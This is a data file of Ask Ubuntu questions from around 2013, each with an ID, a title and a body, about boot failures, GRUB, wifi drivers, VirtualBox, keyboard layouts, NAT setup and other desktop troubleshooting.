365291	unable to boot and boot-loop on splash screen	hey i have tried to install ubuntu many times , but once it installs it boot-loops at the splash screen . it just loops through the boot sound and the screen not sure why . nothing has seemed to work . also its only alowing me to boot windows all other oporating systems crash and loop just like ubuntu ( android x86 , linux mint , red hat , ubuntustudio ) . compac amd 64 3400+ 1gig ram 2 hhd ( 200 gig/120 gig ) 1 ssd ( 500gig ) win7 x86 a video showing what happens
365293	nitrogen stopped working on update from 13.04 to 13.10	i had nitrogen handling my wallpapers in gnome ubuntu 13.04 nitrogen /path/to/wallpers and on system startup nitrogen -- restore after updating to 13.10 nitrogen stopped working . i can start the program but when i select a wallpaper it does n't take effect . any ideas ? i believe gnome is setting the background color above the nitrogen wallpaper and that is why i ca n't see the nitrogen wallpaper . i suspect this because when changing the gnome background color i saw a fleeting glimpse of the nitrogen wallpaper .
365297	kernel compile / recompile and internet connectivity	i am very new to this whole installation thingy , a super dumb question i was assuming that once i have the linux 3.x version folder after extraction from the kernel source , i can move around with the pc and do not have to keep it online when the make command is doing the magic . so the question is when i am compiling a kernel source 1 ) does the compilation process gather data from the internet ? 2 ) should i be connected to the internet all the time when the kernel is being compiled ? i am on ubuntu 12.0 and compiling linux 3.2.0 . please clarify
365298	win+alt+ right click does not work in ubuntu 13.10 gnome fallback	the time widget has disappeared from panel and i want to add it again . as far as i remember i could do that by pressing win+alt and right click . but this does not work in ubuntu 13.10 ( perhaps related to this issue ) . so i am left helpless and appreciate your hints .
365301	cant unmount my hard drive !	so i really want to dual boot windows xp and ubuntu . but when i enter the installer for xp it says not enough partition space or something ... so i go to unmount it and this is what i get ... josiah @ josiah-compaq-cq58-notebook-pc : ~ $ sudo umount /dev/sda2 umount : / : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) i dont know what to do ! i dont know what those processes are and where they are located ! i am a linux newb so this might be really easy to fix but please help !
365302	lenovo ideapad z500 touchpad and screenlight	i 'm using lenovo ideapad z500 model . i installed ubuntu near to windows 8.1 on my computer . at least , my all drivers are working smooth , i had a grub2 problem with ubuntu but , i solved it . after the solve , my touchpad hotkey and my screenlight broken . my touchpad , disabled when i push the fn6 . but not for now . and my screenlight changes everystart . xinput : baris @ baris-laptop : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=11 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=12 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=14 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ video bus id=9 [ slave keyboard ( 3 ) ] ↳ lenovo easycamera id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=13 [ slave keyboard ( 3 ) ] ↳ ideapad extra buttons id=15 [ slave keyboard ( 3 ) ] how can i fix this problem ? previously working functions , does not work now
365303	need to restart for networking to work	recently ( i guess after upgrade to 13.10 ) i have noticed a weird issue . the first time that i start the box , the networking is not connected ( judged based on gnome panel indicator and ping ) . i need to restart to bring it back to life . it is a very annoying issue so i 'm seeking your help to resolve it .
365306	grub failure after upgrading to 12.04	i have a computer with windows 7 and ubuntu 11.04 . while updating from 11.04 to 12.04 an error occurred with grub . it would load but would n't let me launch any of the operating systems . i had to reinstall 11.04 to have grub working as before . i would like to know if upgrading from internet from within ubuntu , or if installing from cd , the same error will occur . i can not lose the windows 7 partition . there is no support for 11.04 any longer , so i would like to upgrade .
365307	volume changes by itself	i have ubuntu 13.10 on a toshiba satellite pro l300 laptop and the sound slider control changes the volume all by itself , sometimes muting the sound altogether . how can i stop this from happening ?
365308	how to make a simple fast and lightweight custom screen locker ?	day to day i 'm seeing many questions which say : screensaver/lock does n't work . screensaver does n't require password after waking or does n't lock the screen . can not exit screensaver / nothing works after pressing key or moving mouse . and many many more not specific with gnome-screensaver only but also with xscreensaver . so how to make a simple , fast and lightweight screensaver which locks the screen after given time and requires the password in order to continue ? in addition to my answer , i request to others who have other answer to share here.. : )
365312	how to add a launcher to unity for an application that is on a automatically mounted partition	i want to add a launcher to adt ( eclipse , with android developers tool plugin ( bundle ) ) , so i 've created an adt.desktop file at ~/.local/share/applications/ directory . contents of the adt.desktop file are : [ desktop entry ] name=adt exec=/usr/bin/env gtk2_rc_files=/home/chris/.gtkrc-eclipse /media/sda5/android/development/adt-bundle-linux-x86_64-20130729/eclipse icon=/media/sda5/android/development/adt-bundle-linux-x86_64-20130729/eclipse/plugins/com.android.ide.eclipse.adt.package_22.0.1.v201305230001 -- 685705/icons/adt.png type=application this is the exact file i am using at desktop pc , but there the adt is located at home directory . at the laptop though , due to a small initial partition for ubuntu , i moved the workspace to the automatically ( on startup ) mounted `` data '' partition . after having logged-out and then logged-in nothing showed up . the same goes for a restart of the laptop . what can i do ? are there any more steps after creating the file into the ~/.local/share/applications/ ? thank you for your time . edit : i 've tried running this command : /usr/bin/env gtk2_rc_files=/home/chris/.gtkrc-eclipse /media/sda5/android/development/adt-bundle-linux-x86_64-20130729/eclipse and got this : /usr/bin/env : /media/sda5/android/development/adt-bundle-linux-x86_64-20130729/eclipse : permission denied .
365315	how to remove gnu grub command line at start up of mac	i 'm a noobie with ubuntu.so i was trying to install ubuntu in a partition of my hd in my macbook through a usb flash drive and something went wrong in the end of the installation ( i got a black screen and my macbook was beeping ) , i restarted my machine and tried to enter the ubuntu partition and it was working fine for some reason.after a while though the screen freezed and i could't enter this partition again so i decided to remove all partitions ( ubuntu and swap ) from disk utility inside mac osx and tried to install it again but when im starting my machine the command line of gnu grab start first and i have to type exit to continue to my mac osx.how can i remove this completely from my macbook ? thank you in advance .
365317	kubuntu installation problem wubi	i tried to install kubuntu for the first time on win7 ( 32-bit ) , then i restarted the computer , and i get this : try ( hd0 , 0 ) : ntfs5 : no wubildr try ( hd0 , 1 ) : ntfs5 : welcome to grub and it stops there . any ideas ?
365319	trouble wirleless and trouble with windows 7	today october 24th 2013 , i just turned on my laptop on windows 7 , but it just froze . i tried like 4 times and it had always the same result . however i could boot windows in safe mode and get some of my files . right now i 'm running ubuntu , because i use it because it does n't have any games and i do n't get distracted . so i have a question : is it possible to uninstall windows and install it again but keep ubuntu safe ? now the problem is that ubuntu 's wireless connection option is not available . it is like gray instead of white so here is the information that you may need zenoheld @ ubuntu : ~ $ sudo uname -a linux ubuntu 3.2.0-39-generic # 62-ubuntu smp thu feb 28 00:28:53 utc 2013 x86_64 x86_64 x86_64 gnu/linux zenoheld @ ubuntu : ~ $ sudo lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 06:00.0 sd host controller : ricoh co ltd mmc/sd host controller ( rev 01 ) 06:00.1 system peripheral : ricoh co ltd memory stick host controller ( rev 01 ) 06:00.3 firewire ( ieee 1394 ) : ricoh co ltd r5c832 pcie ieee 1394 controller ( rev 01 ) 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 )
365324	network manager just keeps asking for wifi password ( how do i get it to connect ? )	how do i get the rt5370 working ? all that happens is the network manager keeps asking for the password . iwconfig wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on it will briefly display this sometimes : wlan0 ieee 802.11bgn essid : '' xxxxxxxxxxxxxxx '' mode : managed frequency:2.xxx ghz access point : xx : xx : xx : xx : xx bit rate=6.5 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on link quality=70/70 signal level=-29 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:5 missed beacon:0 interfaces /etc/network/interfaces auto lo iface lo inet loopback dmesg dmesg | grep -e ndis -e wlan [ 1480.628606 ] wlan0 : authenticate with xx : xx : xx : xx : xx : xx [ 1480.726637 ] wlan0 : direct probe to xx : xx : xx : xx : xx : xx ( try 1/3 ) [ 1480.928084 ] wlan0 : direct probe to xx : xx : xx : xx : xx : xx ( try 2/3 ) [ 1481.132105 ] wlan0 : direct probe to xx : xx : xx : xx : xx : xx ( try 3/3 ) [ 1481.336107 ] wlan0 : authentication with xx : xx : xx : xx : xx : xx timed out [ 1487.992835 ] wlan0 : authenticate with xx : xx : xx : xx : xx : xx [ 1488.090710 ] wlan0 : send auth to xx : xx : xx : xx : xx : xx ( try 1/3 ) [ 1488.092788 ] wlan0 : authenticated [ 1488.140141 ] wlan0 : associate with xx : xx : xx : xx : xx : xx ( try 1/3 ) [ 1488.344083 ] wlan0 : associate with xx : xx : xx : xx : xx : xx ( try 2/3 ) [ 1488.548026 ] wlan0 : associate with xx : xx : xx : xx : xx : xx ( try 3/3 ) [ 1488.752111 ] wlan0 : association with xx : xx : xx : xx : xx : xx timed out [ 1495.452653 ] wlan0 : authenticate with xx : xx : xx : xx : xx : xx [ 1495.550663 ] wlan0 : send auth to xx : xx : xx : xx : xx : xx ( try 1/3 ) [ 1495.552672 ] wlan0 : authenticated [ 1495.604085 ] wlan0 : associate with xx : xx : xx : xx : xx : xx ( try 1/3 ) [ 1495.808095 ] wlan0 : associate with xx : xx : xx : xx : xx : xx ( try 2/3 ) [ 1496.012092 ] wlan0 : associate with xx : xx : xx : xx : xx : xx ( try 3/3 ) [ 1496.018046 ] wlan0 : rx assocresp from xx : xx : xx : xx : xx : xx ( capab=0x431 status=0 aid=6 ) [ 1496.045104 ] wlan0 : associated [ 1496.046016 ] wlan0 : disassociating from xx : xx : xx : xx : xx : xx by local choice ( reason=3 ) [ 1496.211392 ] wlan0 : deauthenticating from xx : xx : xx : xx : xx : xx by local choice ( reason=3 ) all the dongles~ ! ! ! ! ! ! lsusb bus 010 device 002 : id 148f:5370 ralink technology , corp. rt5370 wireless adapter bus 003 device 002 : id 0bda:8176 realtek semiconductor corp. rtl8188cus 802.11n wlan bus 003 device 003 : id 2001:330d d-link corp . okay i have 3 wifi dongles . none work ( but the 8188 worked on 32-bit ) . i really want the rt5370 to work lshw -c network *-network description : wireless interface physical id : 1 bus info : usb @ 10:2 logical name : wlan0 serial : xx : xx : xx : xx : xx : xx : xx capabilities : ethernet physical wireless configuration : broadcast=yes driver=rt2800usb driverversion=3.2.0-54-generic firmware=0.29 multicast=yes wireless=ieee 802.11bgn warning : output may be incomplete or inaccurate , you should run this program as super-user . modprobe has nothing added to it for now # /etc/modprobe loop lp rtc
365328	can i reprint the ubuntu server installation guide ?	may i ask ? if i print the whole installation guide and add it to our thesis appendix for installation guide for the ubuntu server , am i liable for any legal circumstances ? thanks . ps : i just do n't wan na be sued .
365329	cleaning ubuntu 13.10	i 'm new with ubuntu so i do n't understand most of it . a few days ago , everytime that i start the computer , i have a prompt box saying that my disk is full and i have the option to check the disk with the disk analyzer . but since i do n't have any idea of what to delete i do n't want to touch anything . i started checking my user folder and delete everything that was n't useful there but i do n't have much . what else should i do ? cheers .
365332	ubuntu 13.10 2d	i ca n't seem to find a way to have ubuntu 13.04 desktop without 3d effects . does anybody know a way to disable the 3d effects without switching to a different desktop environment ?
365334	install new version iw	trying to install a new version of iw . after extracting , i run the `` make '' command . /bin/sh/ : 1 : pkg-config : not found can not found any development files for libnl i have installed libnl-3-200 libnl-3-dev over the apt-get install command . there is not any libnl.pc file /usr/lib/pkgconfig directory . i dont know how to fix this problem . appreciate any help .
365335	android usb debugging not working !	hey everyone having alot of trouble my android is not detecting usb mountaing . i tried to test it on another computer ( windows 7 ) , wo n't even detect the storage device . i do n't know what the problem is . are there any possible settings that i can configure for it to work ? i tried the adb over network , but idk if i 'm doing it right . please help .
365340	install software from a non-ubuntu iso file	i have a dvd , which has an iso file in it . it 's not an ubuntu dvd , it 's another iso file with some software in it . how can i install this software in ubuntu ? i know this is kind of stupid question . i 'm just new to ubuntu and have googled a lot of solutions . most of them are about how to burn an iso file to a cd .
365343	ubuntu do n't see when my power cable is unplugged	i 'm under ubuntu 13.10 , and i 've a problem of energy management : when i remove the power cable , ubuntu do n't realise it , so it does not inform me about the battery state . it displays 100 % battery and it 's a problem , since i need to know what level of energy my computer still has left ! how can i fix it ? edit : as i can see , no one cares about my question , so i bring some info about it . when i unplug the cable , the system still consider the laptop as plugged . so that , even after 20 minutes without being plugged , the battery indicator tells me the level is still 100 % . if i plug it in again later , then i can see how long it will take to totally charge the battery . so , what i would like is to see the level of my battery when it 's unplugged , to see how long it will last until i need to replug the cable . hope i 'm clear enough to get some interest^^
365344	aircrack 1.1 do not get installed	i have installed the aircrack-ng 1.3 beta . i realized that the program airmon is missing . after this i installed aircrack-ng 1.1 with `` make install '' . for some reason the binaries do not get copied into the /usr/local/bin folder . but i can find some files with the executalbe names inside /user/local/man . how can i fix this ?
365346	virtualbox shared folder mount from fstab fails ; works once bootup is complete	i 've got ubuntu 13.10 installed in virtualbox 4.3 . the host machine is windows . i have a couple of virtualbox shared folders being mounted by /etc/fstab . until recently this setup worked just fine , but after upgrading from ubuntu 13.04 and virtualbox 4.2 ( at essentially the same time ) the fstab mounting stopped working . i get the following error during boot : an error occurred while mounting /home/benme/documents . keys : press s to skip mounting or m for manual recovery pressing m for manual recovery and then trying to mount manually also fails : root @ benme-vb : ~ # cd /home/benme root @ benme-vb : /home/benme # mount documents /sbin/mount.vboxsf : mounting failed with the error : no such device but if i instead skip mounting during boot , wait for unity to start and then mount manually in a shell , everything works fine : benme-vb ~ % ls documents benme-vb ~ % sudo mount documents [ sudo ] password for benme : benme-vb ~ % ls documents # actual file list omitted note that when i mount manually i 'm letting mount take all the options from /etc/fstab , and it works . this suggests to me that it 's some sort of timing issue , where virtualbox is n't `` ready '' to provide the shared file mounts at the point /etc/fstab mounts are run during bootup . here 's the fstab line , just for completeness : documents /home/benme/documents vboxsf uid=benme , gid=benme , dmode=774 , fmode=664 0 0 is there something i can do about this from the ubuntu side ? or does anyone happen to know more about this from the virtualbox angle ? i 've found an old report on the virtualbox bug-tracker with identical symptoms , but in that case the user had updated virtualbox without updating their guest additions and resolving that fixed the problem ; this is n't happening here , i 've definitely got the 4.3 guest additions installed .
365348	driver for canon pixma mg2200 scanner	does anyone have a driver for canon mg2200 printer/scanner , since i ca n't seem to locate one .
365350	steam in ubuntu12.04lts not installing properly . or maybe is n't running properly	i ca n't get steam to run , and so i ran it through the terminal . is there a way to fix this ? terminal log : running steam on ubuntu 12.04 32-bit steam_runtime is enabled automattically /home/david/.local/share/steam/steam/steam.sh : line 717 : 6760 illegal instruction ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' installing bootstrap /home/david/.local/share/steam/bootstrap.tar.xz restarting steam by request ... running steam on ubuntu 12.04 32-bit steam_runtime has been set by the user to : /home/david/.local/share/steam/ubuntu12_32/steam-runtime /home/david/.local/share/steam/steam.sh : line 717 : 6760 illegal instruction ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' i just made my steam and i have n't signed in anywhere else . if i did something wrong , i would greatly appreciate help . -dkino14
365351	xubuntu 13.04 to 13.10 stuck during install on cups-server-common	i 'm in the middle of upgrading to 13.10 but it has been stuck on installing cups-server-common all day long ! ! ! what would be the best thing to do without compromising my system ? ? ?
365352	screen always on when on lightdm login	since updating from 13.04 to 13.10 my monitor when on login screen ( lightdm ) is always on and the blank screensaver never works . gnome screensaver is activated and is working find when logged in . this is bad for electricity consumption
365353	i appear to be un able to open .x86_64 , or .x86 files . ubuntu 13.04	i have recently installed a game and in the game 's folder , there 's a file with the extension of x86_64 . i attempted to open said file and it gave me the error message in the picture below . could not display ksp.x86_64 there is no application installed for executable files . do you want to search for an application to open this file . after that i tried to right click the file and select 'open with other application ' and this error message up . no applications available to open ksp.x86_64 . click show other application for more options , or find applications online to install new applications . i clicked 'find applications online ' and after a few seconds the following error message showed up . gdbus.error : org.freedesktop.dbus.python.xdg.exceptions.parsingerror : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/defer/__init__.py '' , line 489 , in _inline_callbacks result = gen.send ( result ) file `` /usr/lib/python2.7/dist-packages/sessioninstaller/core.py '' , line 1030 , in _install_mime_types path ) ) file `` /usr/lib/python2.7/dist-packages/xdg/desktopentry.py '' , line 33 , in __init__ self.parse ( filename ) file `` /usr/lib/python2.7/dist-packages/xdg/desktopentry.py '' , line 42 , in parse inifile.parse ( self , file , [ `` desktop entry '' , `` kde desktop entry '' ] ) file `` /usr/lib/python2.7/dist-packages/xdg/inifile.py '' , line 81 , in parse raise parsingerror ( `` invalid line : `` + line , filename ) parsingerror : parsingerror in file '/usr/share/app-install/desktop/workrave : workrave.desktop ' , invalid line : - rsi ( repetitive strain injury ) oraz wspomaga rekonwalescencj\u0119 does anyone have any help as to how to solve this issue ?
365356	how do i report a problem with the ubuntu guide website ?	how do i report a problem with the ubuntu guide website ? http : //ubuntuguide.org/images/ubuntuguidesaucypt1.epub is linked from http : //ubuntuguide.org/wiki/ubuntu_saucy_repositories under 'ebook version ' above the list of contents at top of page , . however , that link is 404 'd . also tried http : //ubuntuguide.org/images/ubuntuguidesaucy.epub which also fails . so , where do we report fail at ubuntuguide.org ? i see nowhere there to so do . i have also tried , twice on separate days , to register there , but never get the confirmation email .
365357	where to find new splash screens ? ubuntu 13.10	i 'm looking for , at best , a gui for changing the plymouth splash screen ; i 've used ubuntu since mid 12.04 ( lts ) , and i 'm getting sick of the default splash screen . i do feel comfortable with the terminal , so feel free to respond with some terminal commands .
365358	i 'm getting a lot of `` system program problem detected '' error dialogs , is there any way i can make them go away ?	after upgrading to ubuntu 13.10 i get a lot of error messages with no info when the desktop starts : how can i solve this ? i tried to update and install kde-full and gnome . but it was not solved .
365362	ubuntu 13.10 change first weekday to monday in calendar applet	before the update ( i was using 13.04 ) , editing : sudo gedit /etc/default/locale so that lc_time= '' en_gb.utf-8 '' does the job . however in 13.10 , this does not work anymore . i 've tried editing : sudo gedit /usr/share/i18n/locales/en_au sudo gedit /usr/share/i18n/locales/en_gb sudo gedit /usr/share/i18n/locales/en_us so that first_weekday 2 in each of the files , but this also does not work . as a reference , when i run locale , the output is lang=en_au.utf-8 language=en_au : en lc_ctype= '' en_au.utf-8 '' lc_numeric=en_au.utf-8 lc_time=en_au.utf-8 lc_collate= '' en_au.utf-8 '' lc_monetary=en_au.utf-8 lc_messages= '' en_au.utf-8 '' lc_paper=en_au.utf-8 lc_name=en_au.utf-8 lc_address=en_au.utf-8 lc_telephone=en_au.utf-8 lc_measurement=en_au.utf-8 lc_identification=en_au.utf-8 lc_all= please help .
365363	virtualbox stops when start	when i start my virtualbox on ubuntu 13.10 , it stops on `` starting virtual machine 0 % '' i ca n't use my virtual box i already to remove and install again , but the problem keep .
365364	booting windows 8.1 from grub causes restart	i am a newbie to ubuntu but have had experience with osx and windows in the past . i had windows 8.1 installed on my 1tb wd hard drive and i had a 500gb wd hard drive that i wanted to try and run ubuntu 12.04 and dual boot windows 8.1 from grub . ( i will admit the reason i am doing this is to try ubuntu to see if i can totally make the switch but i am hedging as i am not sure ubuntu can do everything i need ) the install of 12.04 went smoothly . when i start my computer grub starts just fine and ubuntu loads no problem . the issue occurs when i attempt to boot windows 8.1 from the grub menu . when i do this the windows 8.1 logo pops up and then after about 1-5 seconds the computer restarts and starts booting up again into grub . i have been scouring the forums and have seen this issue but nothing solving it . windows 8.1 will boot fine if i switch the boot priority in the bios to booting the windows hd first but this is a pain and not necessarily what i was looking to do every time i need to switch os 's . does anyone have a solution for this ?
365371	scroll , caps , num lock are not working	i am new to ubuntu . i just installed 12.04 on a second hard drive i have however i have been unable to get my scroll , caps , num lock to work and my number pad is therefore stuck on directional mode . any fix for this . keyboard : corsair vengeance k70
365372	serviio does n't show media content - 13.10	i 've recently updated to 13.10 and before i used serviio a lot . however , now i ca n't access media through my samsung tv while serviio is on . it detects serviio and it 's default folders , but no content at all . all the permissions are ok and all the codecs , so far as i know . is there any trick to solve this ? thanks in advance . btw : there 's no serviio tag here . i could n't create it but it could come in handy .
365373	open thunderbird in minimized mode on login	i loved how outlook can start up when you do , but i have n't yet found that option yet in ubuntu . how do you tell it to start , minimized , when you login/startup ?
365374	install ubuntu from ftp server	when i install ubuntu i start from usb flash disk and get image from ftp server , this is my usb flash disk 's menu.lst : '' '' '' default 0 timeout 3600 fontfile /minipe/muifont.gz splashimage /minipe/bg.xpm.gz title ubuntu 12.04.32 kernel /ubuntu/ubuntu12.04.32/linux mirror/protocol=ftp mirror/ftp/hostname=192.168.1.3 mirror/ftp/directory=/ubuntu12.04.32 initrd /ubuntu/ubuntu12.04.32/initrd.gz title ubuntu 12.10.32 kernel /ubuntu/ubuntu12.10.32/linux mirror/protocol=ftp mirror/ftp/hostname=192.168.1.3 mirror/ftp/directory=/ubuntu12.10.32 initrd /ubuntu/ubuntu12.10.32/initrd.gz '' '' '' i put ubuntu-12.04.2-server-i386.iso and ubuntu-12.10-server-i386.iso in ftp server 192.168.1.3. so when start my computer from usb flash disk it can download the installation image and install . i used this method to install the 12.04 version successfully , but when i install 12.10 version it fails in the base system install stage , and returns this error message : [ installation step failed ] an installation step failed . you can try to run the failing item again from the menu , or skip it and choose something else . the failing step is : install the system . i get the install logs and find there is a differences between the two install logs : oct 24 17:30:09 main-menu [ 407 ] : info : menu item 'download-installer ' selected oct 24 17:30:10 net-retriever : gpgv : oct 24 17:30:10 net-retriever : signature made thu feb 14 00:21:10 2013 utc using dsa key id fbb75451 oct 24 17:30:10 net-retriever : gpgv : oct 24 17:30:10 net-retriever : good signature from `` ubuntu cd image automatic signing key < cdimage @ ubuntu.com > '' oct 24 17:30:10 net-retriever : but in the 12.10 version install log : oct 24 08:48:22 main-menu [ 345 ] : info : menu item 'live-installer ' selected oct 24 08:48:22 base-installer : error : could not find any live images oct 24 08:48:22 main-menu [ 345 ] : warning ** : configuring 'live-installer ' failed with error code 1 oct 24 08:48:22 main-menu [ 345 ] : warning ** : menu item 'live-installer ' failed . so why when i install the 12.10 version does it select 'live-installer ' mode ? how can i change it to 'download-installer ' mode like the 12.04 version ? this problem has been bothering me for two days . help me please ! thanks .
365375	ubuntu 12.04.3 download	downloaded ubuntu 12.04.3 package for bootable cd . this package is 707mb and will not fit on normal 700mb cd , please advise . thanks .
365377	on 13.10 , where is my dropbox icon	i just installed ubuntu 13.10 , but i ca n't locate my dropbox icon , which used to reside next to the time , volume controls and such , in the upper right corner of my screen . dropbox icon is no longer shown , how can i turn it on ?
365378	what are some good svn capable gui diff and merge applications available for ubuntu ?	i want to have a svn capable gui based diff and merge program in ubuntu that can compare my version of the source code with that in the svn server repository . then i can selectively copy the svn repositoryâs code fragments onto my working version . this way i can selectively undo the individual changes that i made in my working version . for each application , what are the steps to do the task i described ?
365379	network translation related - linux ubuntu 12.04	i have nat problem . step 1 : i have two machines ( 192.168.100.128 ) and other ( 192.168.100.129 ) . they have a default gateway as 192.168.100.1 . step 2 : i have another machine that has an ip of 192.168.122.85 and default gw of 192.168.122.1.the interface 192.168.100.1 is an interface on this machine ( essentially acting as the default gw of the two machines previously described ) . step 3 : my third machine is having two network interfaces ( essentially having internet connection ) .the wan is 169.x.x.x and other interface is acting as a default gw for the machine mentioned in step 2 . i am running an web server on 192.168.100.129.my problem is i need to access the web server from internet . i am able to reach 192.168.100.1 , 192.168.122.1 from machines that are in the same subnet as machine in step 3.all contain external access.but i am not able to access the 192.168.100.128/192.168.100.129 the reachability works fine between machines in step 2 and step 1 . essentially i want this to happen . at machine containing interface 169.x.x.x and 192.168.122.1 take web traffic ( http ) for 192.168.100.129 and direct it to 192.168.100.1:80 ( since 192.168.100.1 is reachable from machines at step 3 ) .then at machine in step 2 that contains ip of 192.168.122.85 and an interface of 192.168.100.1 , perform another translation i.e . direct the web traffic from 192.168.100.1 to 192.168.100.129:80 can anyone please let me know the iptables i need to write here ? -- thanks
365381	file missing after reboot	yesterday i installed linux i liked how it works on my computer , everything was fine until the need to turn off the computer because when i turned off and on all my pictures , my music were missing any changes to do after you reset or unplugged again to the same ... .
365385	keyboard shorcut for a custom folder in desktop	i would like to configure a keyboard shortcut for a particular folder in my desktop . i will be using this folder quite often and is there a way to open them with a custom keyboard shortcut ? the remote thing i came across regarding this is this question which is for opening home folder similar to windows , but i do not want to go to home folder and navigate from there all the way to a folder in the desktop ( mouse clicking the desktop folder is way too easier than this method ) . so my question : can i have custom keyboard shortcuts for custom folders like folders in desktop ? i 'm using 12.04 .
365395	grub rescue error : unknown filesystem and not finding a solution	my computer is going straight into grub rescue , i cant even change the boot order . when i try loading the mods it cant because it even if i enter the path /boot/grub/x86_64-efi it adds /i386-pc
365397	problem with international keyboard on 13.10	i just upgraded my ubuntu from 13.04 to 13.10 , but i got an issue . usually the `` ' key '' plus `` c key '' make the `` รง '' , but since the update , it change this character to `` altgr + < `` . anyone know why or how can i change it back ?
365398	ibus unikey on ubuntu 13.10	after install ibus unikey , in my entry list did n't show vietnamese ( unikey ) , only show vietnamese . please help me ! ! ! . i try reinstall all things related ibus , but it not work .
365400	when i update ubuntu to 13.10 , ca n't display the top and left side menu	i can not find the left side menu and top menu from the desktop , how to fix it ?
365402	how to use ubuntu touch manage-address-books.py ?	well i have been reading the docs for a few days and i found that i can `` import '' my contacts from a .csv file with the following : alternatively you can import contacts from a csv file . the csv file should be in same format as /usr/share/demo-assets/contacts-data/data.csv . replace the sample data.csv file with your own version and run manage-address-books.py create to import your contacts . but i ca n't figure out how to use manage-address-books.py create could anyone help me ? i know that i can use syncevolution , but i want to sync my .csv file too .
365403	installed ubuntu12.04 in legacy , when changed to uefi just runs the terminal , not gui	well , i installed ubuntu 12.04 in a gateway ne 522 with windows 8 . first , i had to install it in legacy mode , because in uefi it would not run the bootable usb . in the legacy mode it runs perfect . once done that with help of the `` boot-repair '' i changed it to the uefi and disabled the secure boot mode . grub runs fine but when i run ubuntu i get the following message : microcode : failed to load file amd-ucode/microcode_amd_fam16h.bin kvm : disabled by bios kvm : disabled by bios kvm : disabled by bios and then i just get access to the terminal . from there , i have already tried with reinstalling unity and gmd . when i try to install amd64-microcode the same error ocurrs ( microcode : failed to load file amd-ucode/microcode_amd_fam16h.bin ) by the `` updating the microcode on all online processors ... '' phase of the installation . can somebody tell me how can i recover the graphical interphase of ubuntu from the terminal ? thanks a lot
365404	is there a collection of designed cd/dvd labels , wallpapers , or similar ubuntu related artwork ?	is there a collection of designed cd/dvd labels , wallpapers , or similar ubuntu related artwork ? i would like to label my disks `` ubuntu server 13.10 x64 '' but i cant seem to find disk artwork . thanks
365406	making `` xwacom set '' changes permanent	on my thinkpad x220 tablet the touch-finger works flawlessly but the pen is terribly miscalibrated . the calibration tool in system settings - > wacom tablet does not work . instead , whenever i wa n't to use the pen i first need to sudo xsetwacom set 'wacom isdv4 e6 pen stylus ' area 0 0 27760 15690 these changes do not remain permanent . that is , after every reboot they are gone . how can i make the change permanent - i 'm not looking for a startup scrip , i 'd like to set the right area once for all . any idea ?
365412	menu bar and launcher icons missing after amd flgrx propriety drivers installed	i installed the flgrx and drivers on my laptop and after restarting the menu bar and launch icons were missing from my desktop . can anyone give me a solution to this problem , preferably without downloading anything from the internet ?
365417	unable to swap telex and vin on ubuntu 13.10 ( ibus error )	after installing ubuntu 13.10 , and i chose vietnam ( unikey ) . i only typed by telex mode , but i want use vni mode . is there any way to get this ?
